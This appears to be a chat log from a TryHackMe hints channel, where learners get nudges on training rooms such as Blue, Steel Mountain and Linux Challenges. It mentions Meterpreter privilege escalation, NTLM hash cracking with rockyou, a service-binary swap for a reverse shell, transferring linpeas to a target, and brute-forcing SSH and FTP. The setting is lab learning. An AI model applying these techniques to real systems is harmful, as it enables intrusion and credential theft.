There's multiple ways to find the kernel version

And there's a flag that you'll get with one of them

Yeah. I have the kernel

Yeah

But not the flag

Yeah. I was hoping it would be like that.

So keep going

The hint is /etc/*release right?

There's a hint there

hint???

second window was covering that.

just *release

That's a bash/shell glob

yeah. got it.

Look into that and you'll get the flag

ty

Cool, good luck for the rest!

I saw mention of the first part of that file and knew what I needed.

I'm doing a whole lot better with this than i was. I'm loving it all the more.

Something that I've noticed is that most flags, when you go to enter the info, require one hand on alpha and one hand on numeric. Was there a reason for that?

They're md5 hashes usually?

Usually you copy/paste them

SSH in and you can actually copy/paste easily

thx

how do i search a process thats using a port. i tried ps but couldn't find it. some reason my meterpreter decided to make 5 sessions on multiple ports

Huh?

What are you trying to accomplish here?

tried port 4455 also in use

Ok, but what are you actually trying to accomplish here?

LPORT shouldn't be 445

i have a meterpreter on blue on 445 right

That's the RPORT

and now im trying to use shell_to_meterpreter

You don't need shell_to_meterpreter

Do you know what shell_to_meterpreter does?

im following the ctf

yes

i no i can do sessions -u id

it converts a plain shell to a meterpreter

or type shell

You don't have a plain shell, and you already have a meterpreter

why is the ctf telling me to do that?

because metasploit changed the way default payloads work

Side note: It's a room, please call it a room

Not all rooms are CTFs

right

but when i type getsystem no privs

You're already nt authority.

wait now im able to getsystem before i wasn't#

how do i know which hash it is btw? i tried hashid

how do i know which hash it is btw? i tried hashid
@white salmon may be dumb but have u tried hash identifier ?

that's what hashid is right?

nm i figured it out lol

how do i know which hash it is btw? i tried hashid
@white salmon Context is the best way

You dumped it from a windows system's SAM file, it's going to be NTLM or LM

i mean i should have noticed the machine lol i was being dumb

how do i word the hash into a textfile though i have never cracked a nt hash before

You place the string

do you include the entire string

This sounds like a great thing to google

"How to crack ntlm hash"

i tried too but its just on cracking not placement of the hash

Find a better guide then

You need to identify what part the hash is

then put it in a text file (or find a different way)

true i'll look

you can just yeet the entire thing into a file

or you can use the hashcat example hashes

that will help you understand the parts of hashes and what each one looks like

or crackstation because ntlm is rainbow-table able

yeeting the entire thing into a file worked lol

Can someone give me a hint what a "flag" is? What am I looking for?

Asking for Task 5 Find Flags room/blue

flags are little pieces of text hidden in the rooms at certain points, when you've gotten past a certain stage the flag is your reward and proof that you got there

sometimes they're in a file (often flag.txt, or user/root.txt)

or they can be hidden in another file

usually they have a recognisable format, like THM{ text }

where do i find the bin/recycle directory on windows machine

better yet how do you use a command like find on windows?

Have you googled that?

i haven't lol

One of the most important skills in infosec is research

You are expected to do your research before asking here too

i do but sometimes i get the wrong answers on google

get better at googling is honestly the only answer to that

google doesn’t mess up your query does

im trying to complete them without watching the videos

thx @median compass ❤️

could i get a hint on the 2nd flag T5 i checked bin

I wish I wrote down where I kept my password. Luckily it's still stored here on Windows.

Where are password (hashes) stored in windows? Have a look there

thanks

finally completed lol thanks @stuck fractal

Hello- In room 283 (Network Services) Task 4. when using smbclient I am trying to get the information and put it on my attack machine. the command i use while in smb is "get "Working From home Information.txt" interesting1.txt. The response I got was NT_STATUS_DISK_FULL. When I look on my attackbox it shows that the file was transferred into interesting1.txt but there is nothing in the file. can provide screenshot if necessary. Is this a memory issue for my VM?

Storage issue with your VM most likely

Also, the rooms aren't numbered?

IDK where you're getting the numbers from

It seems like they're getting the numbers from the upvotes of the room

ah thats what i thought the number was

Rooms are identified by their titles, and uniquely identified by their room code (the portion of the URL after /room/)

Well I changed the storage in my vmware settings and it now has me using rolling kali tty1. troubleshooting how the heck that happened

Hello guys, just a question, in many paths they refer pass.txt

After tons of wordlists i couldnt crack the hashes

Any idea of specific wordlist or where pass.txt is located?

i think that might just be a placeholder @lyric crystal

are you using kali?

My own attack box (ubuntu)

ok, in most of the THM rooms passwords are used from the rockyou.txt password list

Tried that!

well, in some rooms the hashes aren't crackable

in that case there's always another way to get where you need to be

Its the off sec path, so has to be crackable

like, if i just take 16 completely random characters from /dev/random you'll never crack it (edit: not with a wordlist at least)

what room is it?

Under the path off sec

The active directory/ kerberos

But i ve seen it in other rooms as well

Working on LInux Challenges. I'm up to flag21.php. Trying to figure out how to display it. I used cat and it got the message, but, I guess I'm at a loss as to what I need to do. Got a nudge for me?

well, you can try seclists too

Use rockyou unless you're told otherwise @lyric crystal

they have good lists, but yeah, it's usually rockyou if it will crack at all

I ll try it again guys, thanks, already used most of the seclists

then you also have to be sure you're cracking against the right service, like hydra may get nothing against SSH but succeed against SMB

I started to pull up VisualCodeStudio. Then realized I couldn't move the file. I've tried opening it in web browsers.

Already collected the hashes and recognized successfully by hashcat

Im not that stupid lol

We are all that stupid. We start somewhere

that wasn't my implication, it's not easy to cover every possible scenario on the information given

Anyways..thanks again!

@stone oyster try looking at the raw file, you want to see everything in it, not a rendered version

I see the message MoreToThisFile

do I need to hash that?

you could try what I hinted first 🙂

raw file?

will look into that.

I assumed cat was the raw

imagine you wanted to look at the contents of a binary file

how would you do that

I hate to say it, but I don't know. But I will research and see if I can find an answer.

Ty

if you try googling "look at the contents of a binary file" you'll find it pretty quick I'm sure

thank you.

I didn't get that explicit with my search.

if this all seems very cryptic that's because this is #room-hints, we try not to give the answers but nudge so you can find them yourself

I know. I get that.

I don't like having the answers given to me.

Most of the time a nudge is all I need.

lol

Most of the time.

Oy....so take the code and decipher it?

nope

the very first link in google for me has the answer

I have a stackexchange link

me too

k

I did the xxd and was given a 5 line code

Do I need to go further?

did you read what you got?

i'd recommend man xxd too and learn a little about a very useful command

On the right it's the same text as if I cat. I ran it thru a hex decoder and it showed the same message.

The answer isn't the typical flag of long code.

it's 6 characters

ok, can you copy the output here in spoiler tags? (surround it with ||)

cause it shouldn't show you the same message

lol

I tell ya' what. I gotta' get for now. I will look into man xxd later and see if there's something that I missed.

Thanks for the nudge.

k

Is it ok to send you screenshot?

sure

man this last steel mountain task is really kicking my erse lol.... i've actually gotten to the point where i've replaced the ASCService.exe with my file and i'm able and start the service. netcat responds and says the connection is received, but i never get shell access

Use a multi handler.

Set the payload correctly

If you're using a staged payload then you 100% need multi handler ss your listener

got it, worked like a charm, thanks

On basic pentest what is the correct way to display the smb information of users?

The attackbox doesn't have enum4linux and i cant install via apt?

It's got it as a script on the system

where?

Cmn said recently

cmn?

#site-support message

ahh thanks

still managed to get one user without it lol not sure that was intended

okay im extremely stuck on the priv esc there is no linenum

ahh okay it's in the additional tools

how do i run the linenum on the ssh server?

you transfer it and run it

how to transfer i tried google and scp but the file wasn't there?

scp, wget and http.server, you can just get it straight from the linenum github

lots of ways

didnt think of that thanks

okay so wget doesn't work and http server no module?

tried nano aswell?

Well you can't wget like that because the machine doesn't have internet connection

And in the scp command just remove the last / in the directory, try /home/jan instead of /home/jan/, not sure if that's the problem though

Didnt work it just has no output and when i check the files not there

Try copy to /tmp

I tried that too the files just arent copying over i cant nano the file because of root privs ill just come back to it. Only need the last password.

And about: python3 -m http.server (AttachBox) (directory with linpeas.sh) | go to /tmp and wget http://ipfromVPN:8000/linpeas.sh (machine vict)? If you need edit, try vi/vim.

Python has no module named http.server i could script it but meh. The wget just sits and hangs on connecting i think its the attack box ill try it on a vm instead

Wait, only python?
Try: python -m SimpleHTTPServer

I tried that same error message lol

Lmao 😩

just try pip3 install httpserver

But he need internet, right? AttackBox has internet?

Its just hanging again? Did i go over minutes or something

attack box has internet

machines in rooms don't

I had to watch the video included. I followed what he did with scp to a t. And still nothing

scp command should work

send screenshot of your scp command

It doesnt transfer

I just reset the box but i used the one in the video and scp linenum.sh jan@10.10.32.239:/dev and others like 239/dev/

And /tmp

I just want to make sure I know what I'm seeing and thinking. For the Linux Challenges room, flag23, the directions say to find it, then reverse it. They want me to report the flag backwards?

If its a file it means reverse engineer usually.

and yet, I tried typing it in backwards and it went.

That was just kind of unsettling in my head.

Maybe I'm tired.

@white salmon I started an AttackBox, logged as jan, used wget, linpeas.sh was copied and running ok, that's crazy..

What directory did you use

/tmp

What the hell

Basic Pentesting, right?

SCP tested, and it's ok.

Flag24, the C compiled flag. I tried the gcc and no matter what I do I keep getting a list of what looks like errors.

Linux Challenges?

yeah buddy

Sorry, I can't help, don't have access to this room.

It's not paid

If it is, then I shouldn't be able to get in.

It is a subscriber room

You're subscriber, so you can access..

oh.....interesting.

lol

Maybe the last payment I made hasn't run out yet.

So...I did ./flag and get the message.

Checked the hint and it asks who can access. I know who can access.

So I need to do the absolute most basic reverse engineering

It's suggesting a program that finds strings in files

oh.

Anybody open for a ?

@clear saddle It's always better to just directly ask your question. If someone can help then they will.

We don't know if we can help unless we know the question, after all

I know how to shh but the password for the linux course must have been changed.

it says use shiba 1 but this does not get me in

You don't share virtual machines

The password hasn't been changed

Make sure you're deploying the Learn Linux VM not the attack box

They're totally separate.

If you wanna' ask about programming, one of these folks can help. If you wanna' ask about comfort food, then ask me.

Don't use that word here, it's a slur

My apologies

I do not see the Learn Linux link

In task one

There's a deploy button

VMs are attached to tasks rather than rooms. A room is made up of several tasks. A task can have: a download, a VM, or neither attached.

I got now. thanks so much

I appreciate the help @stuck fractal

Is the message in the flag24 file supposed to suggest a command/program to find a string with?

or just suggesting that i do that?

The question itself suggests that you do that

ok. thank you.

Analyse the flag 24 compiled C program. Find a command that might reveal human readable strings when looking in the source code.

Is there a particular way or command or program to use?

Yep. A specific command makes it easy

ty

@inland onyx also, it shouldn't say source code here. linuxctf task 4

You're not looking in the source code, considering you're looking in a compiled binary

I'm going to bed, but I found what I need to do the work tomorrow.

night ya'll.

thanks for your help.

Hi there,
regarding room startup I do have access to FTP, found the related folder on the website but don't know where to look at ?
tried bruteforcing ssh & ftp with the username in the FTP share without success, is it the correct way to go ?

No hints/help are allowed for new rooms till 72 hours passes.

Okay 🙂

thanks for the info @wintry yarrow didn't knew that rule.

Check rule 13. 🙂

I'm stuck on 2 questions to complete the physical security room. intro. could someone please help me.... task 6 Q.5 - An improperly hung door which opens away from you can be bypassed using this type of tool?, and the other one was task 6 last question -Adams Rite hardware fixtures are susceptible to a bypass where a wire is snaked through the keyway and actuates the locking mechanism behind it, what could prevent this bypass?

if someone could assist thanks

missing those ones myself @polar mountain 🙂

i been racking my brain on them

@limber bane any tips please?

Keeps searching my dude, you'll get them eventually, watch the videos provided and use the information the questions gives you

Thanks mate

Room: https://tryhackme.com/room/borderlands

I have credentials on the website but i don't know how to contest the differents questions of the room

Guys, for y'all that completed the zthlinux room (the one that teaches some commands, ssh...) how did you go through finding the last answer inside ||/var/log||?

is that where it says the flag is?

heyhey

im at kenobi task 4 question 2

and i dont know what to do

The room is a walkthrough room... Which bit?

never mind i got it'

thanks though

is that where it says the flag is?
@simple mountain Yes, after getting all user's passwords

passwords? are you sure you are in Kenobi room?

Oh sorry, mixed you up with the other guy...

zthlinux is a big room - Which task are you on?

The last one, the little challenge. I finished it already but I want to know how other people went through it, 'cause there is no hint there as where or how to get it, I spent a lot of time to get to it

the 'True ending'?

Yes

The last one, the little challenge. I finished it already but I want to know how other people went through it, 'cause there is no hint there as where or how to get it, I spent a lot of time to get to it
I mean, finding the file is pretty easy, but the challenge gives no hint on how to get it, just throw the challenge at you

Oh I see. Thats part of it, and how most other challenges are set out. But HOW to do it is using the skills that have just been taught.

Yea, I thought so too, so I tried messing with permissions, shell scripts and such, but in the end I just got lucky I guess 'cause I didn't need any of those

In your case, how did you find the ||/var/log/test1234||?

And why did you search there for that file?

IIRC, I searched for files owned by a certain user.